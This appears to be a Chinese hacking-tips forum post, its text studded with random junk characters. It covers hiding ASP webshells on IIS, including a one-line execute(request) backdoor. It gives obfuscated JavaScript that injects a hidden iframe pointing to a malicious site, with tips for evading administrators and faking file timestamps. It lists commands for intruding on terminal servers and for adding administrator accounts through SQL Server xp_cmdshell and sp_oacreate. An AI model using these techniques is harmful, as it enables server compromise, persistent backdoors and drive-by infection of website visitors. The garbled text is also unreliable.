; G3 R% i" A/ ?53、隐藏ASP后门的两种方法 j2 o6 Y& k8 _) m: X
1、建立非标准目录:mkdir images..\/ i7 M2 N( b) E' {7 j
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp& r! }8 @: C+ v/ ?- d
通过web访问ASP木马:http://ip/images../news.asp?action=login3 N+ f7 i: f# M& T* r$ j
如何删除非标准目录:rmdir images..\ /s
( a; E- E) D# R6 q# h/ z2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
# ^8 W! D0 Q( O7 [; Imkdir programme.asp
' l, l& g) W0 q8 J. ]新建1.txt文件内容:<!--#include file=”12.jpg”-->9 d: b! Q8 P {) a
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
" v. S. l) i. O8 L7 N% Nattrib +H +S programme.asp& W% M1 x: O' Y; q3 E5 w5 Y' b
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt# Z d4 a) j$ r6 p
; W( }- o1 o- m& z54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
8 e& Y( }$ }% g( I" O6 D然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。1 b9 a- @) }$ Z! A! l1 W3 @
! p" q0 }2 [% S. f
55、JS隐蔽挂马4 ~+ y J' ?- m G9 N
1.3 ~* ~5 N3 ?% ^
var tr4c3="<iframe src=ht";
- k. G, A; J" t1 O# ~0 btr4c3 = tr4c3+"tp:/";! [/ N) [3 D) a) b8 J1 k
tr4c3 = tr4c3+"/ww";2 A5 I; |) L4 G) Y, Z
tr4c3 = tr4c3+"w.tr4";
5 C! g6 b) z9 U, V$ ytr4c3 = tr4c3+"c3.com/inc/m";
7 i2 z6 r* f5 h4 @; `, wtr4c3 = tr4c3+"m.htm style="display:none"></i";% d/ c" \, g4 x4 C! H; W
tr4c3 =tr4c3+"frame>'";' Y" \% Z, w( z+ f T0 Q
document.write(tr4c3);
3 c1 N9 A) I5 `; X# i; C A1 T避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。) a: R; v" g( z( A& j+ P& z7 z( d
+ l1 b- |# W. e' t0 f' H- s
2.. I6 T& d x; _* [ W) H' c
转换进制,然后用EVAL执行。如$ q, ]7 @5 m$ m* z6 a5 l7 V
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");& u" v- u2 q; p8 w
不过这个有点显眼。
& T% o1 e, k2 r3.# ~6 K# N. f. s+ I- y& _4 Q; ]
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
2 {. U) e- K7 c7 ]- s最后一点,别忘了把文件的时间也修改下。
& y" i/ |2 u; G) h4 a$ b* F8 B9 u- U% p0 n$ K
56.3389终端入侵常用DOS命令
# d, B8 l5 k4 }+ a! x5 z' Ptaskkill taskkill /PID 1248 /t' X1 g: T3 |9 D: Y2 L
+ _/ a- D- @' ?! B8 s% O
tasklist 查进程
; i$ _% ]! d# k9 d+ `9 K; x' _1 Z! G0 X6 `2 ?4 b1 Y$ m! Z" Z E
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
+ ?. E, N* X+ f. d. r, W/ B6 Ziisreset /reboot8 f* {. n$ R- b/ J3 |
tsshutdn /reboot /delay:1 重起服务器
3 i' C; n$ W6 l6 ^( T q. G6 P
* U% ?2 S# [3 U" c4 J, jlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,& P0 H/ w: @* }- s5 x. K% q
5 J+ S! I& b S7 Hquery user 查看当前终端用户在线情况7 M' t+ \. p, H# }* p* e% w
/ ]8 V, N- O5 q' ?; D
要显示有关所有会话使用的进程的信息,请键入:query process *
; R7 @# O5 l6 _/ O" m0 A3 T+ e5 U ?
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. G& b# l0 T3 [+ F# U" t
, b4 K$ A# B# Y" g c. r5 z4 M I1 ^
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2. v J$ ]1 l9 P
; E h, v) F8 S/ S, }2 z: j: ]/ T
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
; x% m" j* F: G7 Y C0 k! Q% u
3 a) @/ c5 u& y7 I [命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启% f5 S/ d) x% I1 [
( m4 B# u- E$ Y1 A- ^ i命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: @8 I- o, p3 D( i: T6 \! D+ S" c( F# L# q" f+ A& q }) r- Y! k# |
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
p* }- l6 x5 Y- w- P' D
5 O0 O! v* G/ ]) {; ^命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机3 g' ?( A: x" V5 @8 i/ C
7 U: s8 j5 |( e% \. H$ s8 W" G- z# I
56、在地址栏或按Ctrl+O,输入:4 {' D5 ^. M6 p4 u9 Y) f
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 A5 v/ D2 v& U2 @' b8 }. V* |8 u3 y- G
8 y0 r3 m0 z! m% a7 ?
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
7 R6 T) V3 ?3 s4 u/ k7 [+ E0 h0 _. d6 X8 X, y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,5 p% \, f n5 K5 W0 D+ s
用net localgroup administrators是可以看到管理组下,加了$的用户的。( }! S$ H3 |" |1 }
6 f. ^9 ^6 z8 f3 ?" W5 y; g5 }, G
58、 sa弱口令相关命令
9 k9 D" B. v# W# [; c4 j/ A) K# E9 h0 Q! C+ I1 ?+ }7 @
一.更改sa口令方法:
! e: F+ ~9 P% ?3 r- ?$ T. u, Q用sql综合利用工具连接后,执行命令:1 F/ d0 M$ Z8 i
exec sp_password NULL,'20001001','sa'
' j9 l% c' K5 U9 h(提示:慎用!)
& v* R, B3 O- Y& z% Q. S# G) N& P8 O% u$ `% M3 R" n
二.简单修补sa弱口令.
( y0 U) Y2 q- |0 l/ g
q7 K5 U/ i# G+ b方法1:查询分离器连接后执行:
6 P0 C9 E' g. D$ D. E. ]- A3 c4 Wif exists (select * from
* I1 p& s1 H8 p* v/ H$ edbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and3 j5 f5 u, j4 u' q( T
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)+ W0 g( M5 y- [
' v/ o$ j0 Z' {, O4 gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( U" m; _. a8 y% [
; Y+ e( o5 u# D( O* vGO
$ @3 A6 g9 `" U) ]1 _ l- P' h1 C) j2 {; m) |* S
然后按F5键命令执行完毕
/ _5 _0 S4 w7 s9 O/ t# B5 n; W8 L8 [1 {. u
方法2:查询分离器连接后: V C- _6 R) ^+ W
第一步执行:use master
6 S% m" D" z/ R' Y; p第二步执行:sp_dropextendedproc 'xp_cmdshell'+ D# |9 S# A) P( D- D$ W3 ?
然后按F5键命令执行完毕
+ K& b; D- `9 H8 n. C, l6 U8 T; Z9 f9 o# O
+ m2 b$ x7 G/ x& t; G% x( v) w6 H
三.常见情况恢复执行xp_cmdshell.
( T" d: ?6 ]3 y& i) i
. {0 s$ T0 l' c3 l7 ^! C& a
' A% ?. C/ Z% J+ z% ?* f1 未能找到存储过程'master..xpcmdshell'.
/ K% k& Q. D& I9 s! A& J; ~" P 恢复方法:查询分离器连接后,3 {+ k- j1 i* E' c6 G8 Z# V
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int1 V5 C/ H% f' C: B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 j8 d2 a# G* N& I4 @' m然后按F5键命令执行完毕& c* k% F4 k! |) e( ?& M9 C
# V# W2 q( W- f$ Q( d9 `* H
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
$ P$ S) X @ T' v/ a. j恢复方法:查询分离器连接后,* p) o4 }- D* A3 D, }
第一步执行:sp_dropextendedproc "xp_cmdshell"' k& z! T* U# B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: G" D; s+ ]- S* |* R然后按F5键命令执行完毕' s1 S5 h9 i& {
, B8 p [9 [- g4 Q3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)! I; _) x$ @$ e
恢复方法:查询分离器连接后,' V5 z6 z. E- q9 T' { m, q# E
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'/ e) F9 X4 I* k
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 4 b$ ^0 s m- b' z8 s6 q* Z
然后按F5键命令执行完毕0 W% |! L% K0 E$ a$ L' e- h9 X
3 T6 F7 M+ l1 R L
四.终极方法.. c K7 A$ `) r+ `: w
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. l7 M) [! X! O& k) z. T- q查询分离器连接后,
Q r0 y' x% B, }$ b& }; _2000servser系统:
& N' |/ D5 t7 }$ P2 c3 bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'( o" [- B& N/ Q# }( r# V
; j Y, b- P3 s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 Y# {6 c* N" D' }
+ _+ r1 N+ e& A' v# G/ r9 J; W" _
xp或2003server系统: t4 V% M9 @+ m5 u* r4 R0 b
) N3 l3 X/ m" i: f7 A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
4 A$ K+ l5 f) b% Y0 D
W B/ Y, p+ q: U- w" tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 b$ M/ {* S* c |
发表于 2012-9-15 14:13:15
收藏
支持
反对